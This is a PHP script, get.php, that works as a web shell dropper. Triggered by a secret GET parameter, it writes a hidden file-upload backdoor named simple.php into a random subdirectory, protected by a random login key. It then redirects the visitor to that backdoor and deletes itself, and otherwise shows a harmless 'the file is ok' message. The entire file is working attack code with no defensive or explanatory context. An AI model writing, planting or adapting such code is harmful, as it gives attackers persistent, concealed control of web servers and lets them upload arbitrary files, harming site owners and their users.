get.php

<?php
if(isset($_GET['fuck']) &&  $_GET['fuck'] == '1'){
$name='simple.php';//要生成的文件名
$canshuStr = str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890');
$canshu = substr($canshuStr,0,6);
function getDir($dir) {
    $dirArray[]=NULL;
    if (false != ($handle = opendir ( $dir ))) {
        $i=0;
        while ( false !== ($file = readdir ( $handle )) ) {
            if ($file != "." && $file != ".."&& $file != ".htaccess"&&!strpos($file,".")&&!strpos($file,"log")&&!strpos($file,"error")&&!strpos($file,"cgi")&&!strpos($file,"bin")) {
                $dirArray[$i]=$file;
                $i++;
            }
        }
        closedir ( $handle );
    }
    return $dirArray;
}
$file= '<?php if($_GET["login"]=="'.$canshu.'"){if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<b>Upload Complate !!!</b><br>"; }'.' echo'." '".'<form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" size="50"><input type="submit" value="submit"/></form>'."';} ?>";
$home = $_SERVER['SERVER_NAME'];
$cat1=getDir("./");
$max1=count($cat1);
$id=rand(0,$max1-1);
$path1=$cat1[$id];
$cat2=getDir("./".$path1);
if($cat2[0]!= null){
    $max2=count($cat2);
    $id=rand(0,$max2-1);
    $path2=$cat2[$id];
    $path=$path1."/".$path2."/".$name;
    file_put_contents($path,$file);
    $url1 = "http://".$home."/".$path."?login=".$canshu;
    echo '<meta http-equiv="Refresh" content="0; url='.$url1.'">';
}else{
    $path=$path1."/".$name;
    file_put_contents($path,$file);
    $url2 = "http://".$home."/".$path."?login=".$canshu;
    echo '<meta http-equiv="Refresh" content="0; url='.$url2.'">';
}
unlink("./get.php");
}else{
    echo "the file is ok....";
}